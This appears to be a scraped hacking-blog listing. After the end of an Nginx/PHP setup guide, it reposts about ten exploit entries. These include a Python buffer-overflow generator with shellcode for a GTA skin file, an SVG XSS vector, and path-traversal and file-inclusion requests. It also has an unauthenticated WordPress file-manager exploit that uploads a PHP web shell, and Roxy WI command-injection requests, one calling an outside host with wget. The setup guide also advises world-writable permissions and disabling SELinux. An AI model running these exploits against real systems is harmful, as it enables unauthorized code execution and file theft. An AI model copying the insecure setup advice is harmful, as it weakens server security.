mysql_secure_installation Add a separate Nginx configuration file for the website In fact, each distribution of the Nginx configuration file for placing the website has its own methods, some are placed in /etc/nginx/conf.d/ vim /etc/nginx/conf.d/ln.conf server { listen 80; listen 8085; listen [:]:8085; listen [:]:80; server_name 192.168.123.98; index index.php index.html index.htm default.php default.htm default.html; root /var/www/ln/public; #Run directory include /etc/nginx/default.d/*.conf; index index.php index.html index.htm; location ~ \.(php|phar)(/.*)?$ { #php access configuration fastcgi_split_path_info ^(.+\.(?php|phar))(/.*)$; fastcgi_intercept_errors on; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/run/php-fpm/www.sock; } #Pseudo-static configuration location/{ if (!-e $request_filename){ rewrite ^(.*)$ /index.php?s=$1 last; break; } } access_log /var/log/nginx/ln.log; error_log /var/log/nginx/ln-error.log; } The website file directory gives readable and write permissions chown -R www.www /var/www/ln FAQ Cannot parse php file Configure ln.conf file include /etc/nginx/default.d/*.conf; index index.php index.html index.htm; location ~ \.(php|phar)(/.*)?$ { fastcgi_split_path_info ^(.+\.(?php|phar))(/.*)$; fastcgi_intercept_errors on; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/run/php-fpm/www.sock; } 502 cd /var//run/php-fpm/ chmod -R 777 www.sock /var/lib/php/session nginx cannot start setenforce 0
  16. HireHackking

    Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow # Exploit Date: 22.01.2023 # Discovered and Written by: Knursoft # Vendor Homepage: https://www.rockstargames.com/ # Version: v1.1 # Tested on: Windows XP SP2/SP3, 7, 10 21H2 # CVE : N/A #1 - Run this python script to generate "evil.bmp" file. #2 - Copy it to [Your Game Path]\skins. #3 - Launch the game and navigate to Options > Player Setup and choose skin "evil". #4 - Buffer Overflow occurs and calc.exe pops up! #msfvenom -p windows/exec CMD="calc.exe" buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00" buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65" buf += b"\x00" #any shellcode should work, as it seems there is no badchars ver = 0 #set to 1 if you want it to work on GTA III steam version esp = b"\xb9\xc5\x14\x21" #mss32.dll jmp esp bmphdr = b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00" #generic bmp header payload = bmphdr payload += b"\x90" * 1026 if ver == 1: payload += b"\x90" * 112 payload += esp payload += b"\x90" * 20 #padding payload += buf with open("evil.bmp", "wb") as poc: poc.write(payload)
  17. HireHackking

    Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) # Date: 19/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: ActiveITzone # Vendor Homepage: https://activeitzone.com/ # Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405 # Version: 6.5.0 # Tested on: Live ( Centos & Litespeed Web Server) # Demo Link : https://demo.activeitzone.com/ecommerce/ # Description # The Active eCommerce CMS 6.5.0 application has a vulnerability in the profile picture upload feature that allows for stored cross-site scripting (XSS) attacks. Specifically, the vulnerability lies in the handling of "svg" image files, which can contain malicious code. An attacker can exploit this vulnerability by uploading a specially crafted "svg" image file as a profile picture, which will then be executed by the application when the user views the profile. This can allow the attacker to steal sensitive information, such as login credentials, or to perform other malicious actions on the user's behalf. This vulnerability highlights the importance of proper input validation and image file handling in web application development. # Exploit Details # # Vulnerable Path : /aiz-uploader/upload # Parameter: files (POST) # Vector: <svg version="1.1" baseProfile="full" xmlns=" http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("haha XSS"); </script> </svg> # Proof of Concept (PoC) : Exploit # 1) Goto: https://localhost 2) Click Registration 3) Login Your Account 4) Go Manage Profile 5) Now Upload Given Vector as anyname.svg (you must put vector code in anyname.svg file) 6) After Upload Clic to view Your profile picture 7) XSS Popup Will Fired # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv
  18. HireHackking

    ManageEngin AMP 4.3.0 - File-path-traversal

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal ## Author: nu11secur1ty ## Date: 11.22.2023 ## Vendor: https://www.manageengine.com/ ## Software: https://www.manageengine.com/privileged-session-management/download.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309) ## Description: The `pmpcc` cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The testing payload ..././..././..././..././..././..././..././..././..././..././etc/passwd was submitted in the pmpcc cookie. The requested file was returned in the application's response. The attacker easy can see all the JS structures of the server and can perform very dangerous actions. ## STATUS: HIGH Vulnerability [+] Exploits: ```GET GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1 Host: localhost:9292 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd; _zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a; JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E; JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Mobile: ?0 X-Requested-With: XMLHttpRequest Sec-CH-UA-Platform: Windows Referer: https://localhost:9292/AMPHome.html ``` [+] Response: ``` ,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is e-mailed to the user who raises the request, the user who closes the request and also to those e-mail ids specified at the time of closing the request.' ,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username' ,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next synchronization is scheduled to run on' ,'js.agent.csharp_Windows_Agent':'C# Windows Agent' ,'js.PassTrixMainTab.in_sec':'Seconds' ,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or paste the CSR content.' ,'js.connection.colors':'Colors' ,'js.general.ShareToGroups':'Share resource to user groups' ,'js.connection.mapdisk':'Drives' ,'jsp.admin.Support.User_Forums':'User Forums' ,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)' ,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly integrate and perfectly fit into the pre-designed and automated integrations of the below listed RPA-powered platforms, to simulate the routine manual password retrieval from the PAM360 vault.' ,'js.discovery.loadhostnamefromfile':'From file' ,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please enter a valid Implementation Class' ,'js.general.GroupedResources':'Grouped Resources' ,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.' ,'PROCESSID':'Process Id' ,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services fetched successfully' ,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled' ,'js.commonstr.search':'Search' ,'js.discovery.usercredential_type':'Credential Type' ,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check high availability status every <input type=\"text\" class=\"txtbox\" name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\" style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\" > minutes.' ,'pki.js.help.entervalidnumber':'Please enter a valid number for Numeric Field Default Value.' ,'js.remoteapp.fetch':'Fetch' ,'js.admin.HighAvailability.configured_successfully':'Configured Successfully' ,'js.generalSettings_searchTerm_Password_reset':'Password Reset, Reason for password reset, disable ticket id, waiting time, wait time for service account password reset, linux unix password reset' ,'letsencrypt.enter.domainnames':'Enter domain names' ,'js.discovery.resourcetype':'Resource Type' ,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\'' ,'js.report.timeline.todate':'Valid To' ,'js.general_Language_Changed_Successfully':'Language Changed Successfully' ,'js.aws.credentials.label':'AWS Credential' ,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable purging of audit trails.' ,'js.general.user.orgn_bulkManage':'Manage Organization' ,'js.rolename.SSH_KEY':'Create\/Add key' ,'js.admin.admin.singledbmultiserver.name':'Application Scaling' ,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report' ,'js.settings.breach_settings.disable_api':'Disable API Access' ,'js.cmd.delete.not_possible':'Command cannot be deleted as it is already added to the following command set(s).' ,'js.settings.notification.domaincontent':'Notify if domains are expiring within' ,'js.aws.searchuser':'--Search UserName--' ,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing system settings in Admin >> General >> Ticketing System Integration.' ,'js.discovery.port':'Gateway Port' ,'usermanagement.showCertificates':'Show Certificates' ,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory cannot be empty' ,'js.sshreport.title':'SSH Resource Report' ,'js.encryptionkey.update':'Update' ,'js.aws.regions':'Region' ,'js.settingsTitle1.UserManagement':'User Management' ,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length' ,'js.commonstr.selectResources':'Select Resources' ,'RULENAME':'Rule Name' ,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User Group added successfully' ,'js.reports.SSHReports.title':'SSH Reports' ,'js.CommonStr.ValueIsLess':'value is less than 2' ,'js.discovery.discoverystatus':'Discovery Status' ,'js.settings.security_settings.Web_Access':'Web Access' ,'js.general.node_name_cannot_be_empty':'Node name cannot be empty' ,'js.deploy.audit':'Deploy Audit' ,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority' ,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate user group(s) to exempt from access control.' ,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)' ,'js.admin.HighAvailability.High_Availability_status':'Status' ,'settings.metracker.note0':'Disable ME Tracker if you do not wish to allow ManageEngine to collect product usage details.' ,'SERVICENAME':'Service Name' ,'settings.metracker.note1':'Access Manager Plus server has to be restarted for the changes to take effect.' ,'js.general.NewPinMismatch':'New PIN Mismatch' ,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'' ,'java.ScheduleUtil.minutes':'minutes' ,'js.admin.sdpop_change.tooltip':'Enabling this option will require your users to provide valid Change IDs for the validation of password access requests and other similar operations. Leaving this option unchecked requires the users to submit valid Request IDs for validation.' ,'js.privacy_settings.title.redact':'Redact' ,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25 resources can be selected' ,'js.aboutpage.websitetitle':'Website' ,'js.customize.NumericField':'Numeric Field' ,'js.please.select.file':'Please select a file to upload.' ,'js.AutoLogon.Remote_connections':'Remote Connections' ,'pki.snmp.port':'Port' ,'java.dashboardutils.TODAY':'TODAY' ,'js.schedule.starttime':'Start Time' ,'js.ssh.keypassphrase':'Passphrase' ,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus' ,'js.analytics.tab.ueba.msg4':'guide' ,'js.analytics.tab.ueba.msg5':'to complete the integration. For any further questions, please write to us at pam360-support@manageengine.com.' ,'js.reportType.Option7.UserAuditReport':'Audit Report' ,'js.common.csr':'CSR' ,'js.globalsign.reissue.order':'Reissue Order' ,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior for individual users and entities by mapping different user accounts' ,'js.analytics.tab.ueba.msg7':'Verify actionable reports that symbolize compromise with details about actual behavior and expected behavior.' ,'js.resources.importcredential':'Import Credentials' ,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from different sources, including firewalls, routers, workstations, databases, file servers and cloud services. Any deviation from normal behavior is classified as a time, count, or pattern anomaly. It then gives actionable insight to the IT Administrator with the use of risk scores, anomaly trends, and intuitive reports.' ,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:' ,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360 instance, download Log360 UEBA from the below link and follow the instructions in this' ,'js.settingsTitle2.MailServer':'Mail Server' ,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing AMP Encryption Key' ,'settings.unmappedmails.email':'E-mail Address' ,'amp.connection.connection_type':'Connection Type' ,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based on activity time, count, and pattern.' ,'godaddy.contactphone':'Contact Phone' ,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already implemented. Implement with some other class.' ,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in Windows devices, SQL servers, FTP servers, and network devices such as routers, firewalls, and switches.' ,'js.rolename.freeCA.acme':'ACME' ,'digicert.label.dcv.cname':'CNAME Token' ,'js.helpcontent.createuser':'User Creation ' ,'pgpkeys.key.details':'Key Information' ,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status' ,'js.HomeTab.TaskAuditView':'Task Audit' ,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups Shared With User Group(s)' ,'js.common.importcsr.format':'(File format should be .csr)' ,'js.notificationpolicy.Submit':'Save' ,'pmp.vct.User_Audit_Configuration':'User Audit Configuration' ... ... ... ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)) ## Reference: [href](https://portswigger.net/kb/issues/00100300_file-path-traversal) ## Proof and Exploit: [href](https://streamable.com/scdzsb) ## Time spent `03:00:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit Data Base https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  19. HireHackking

    sleuthkit 4.11.1 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: sleuthkit 4.11.1 - Command Injection # Date: 2023-01-20 # CVE-2022-45639 # Vendor Homepage: https://github.com/sleuthkit # Vulnerability Type: Command injection # Attack Type: Local # Version: 4.11.1 # Exploit Author: Dino Barlattani, Giuseppe Granato # Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639 # POC: fls tool is affected by command injection in parameter "-m" when run on linux system. OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter when it run on linux, a user can insert in the -m parameter a buffer with backtick with a shell command. If it run with a web application as front end it can execute commands on the remote server. The function affected by the vulnerability is "tsk_fs_fls()" from the "fls_lib.c" file #ifdef TSK_WIN32 { .... } #else data.macpre = tpre; <--------------- return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data); #endif Run command: $ fls -m `id` [Options] -- *Dino Barlattani* www.linkedin.com/in/dino-barlattani-10bba11a9/ www.binaryworld.it <http://Binaryworld.it> www.youtube.com/user/dinbar78
  20. HireHackking

    WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env # Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE # Date: [ 22-01-2023 ] # Exploit Author: [BLY] # Vendor Homepage: [https://wpscan.com/vulnerability/10389] # Version: [ File Manager plugin 6.0-6.9] # Tested on: [ Debian ] # CVE : [ CVE-2020-25213 ] import sys,signal,time,requests from bs4 import BeautifulSoup #from pprint import pprint def handler(sig,frame): print ("[!]Saliendo") sys.exit(1) signal.signal(signal.SIGINT,handler) def commandexec(command): exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php" params = { "cmd":command } r=requests.get(exec_url,params=params) soup = BeautifulSoup(r.text, 'html.parser') text = soup.get_text() print (text) def exploit(): global url url = sys.argv[1] command = sys.argv[2] upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" headers = { 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww", 'Connection': "close" } payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--" try: r=requests.post(upload_url,data=payload,headers=headers) #pprint(r.json()) commandexec(command) except: print("[!] Algo ha salido mal...") def help(): print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"") print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id") if __name__ == '__main__': if len(sys.argv) != 3: help() else: exploit()
  21. HireHackking

    Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # ADVISORY INFORMATION # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31126 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 73 Origin: https://192.168.56.116 Referer: https://192.168.56.116/app/login.py Connection: close show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;
  22. HireHackking

    Roxy WI v6.1.0.0 - Improper Authentication Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31125 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 105 Origin: https://192.168.56.114 Dnt: 1 Referer: https://192.168.56.114/app/login.py Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
  23. HireHackking

    GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin

    HireHackking posted a blog entry in Hacker Technology
    # ADVISORY INFORMATION # Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin # Date of found: 11 Jun 2022 # Application: GLPI Manageentities < 4.0.2 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/manageentities # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE : CVE-2022-34127 # PoC GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
  24. HireHackking

    GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # ADVISORY INFORMATION # Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion # Date of found: 11 Jun 2022 # Application: GLPI Glpiinventory <= 1.0.1 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/glpi-project/glpi-inventory-plugin # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-31062 # PoC POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
  25. HireHackking

    Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

    HireHackking posted a blog entry in Hacker Technology
    # ADVISORY INFORMATION # Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.1.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31161 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://192.168.56.116 Referer: https://192.168.56.116/app/login.py Connection: close show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;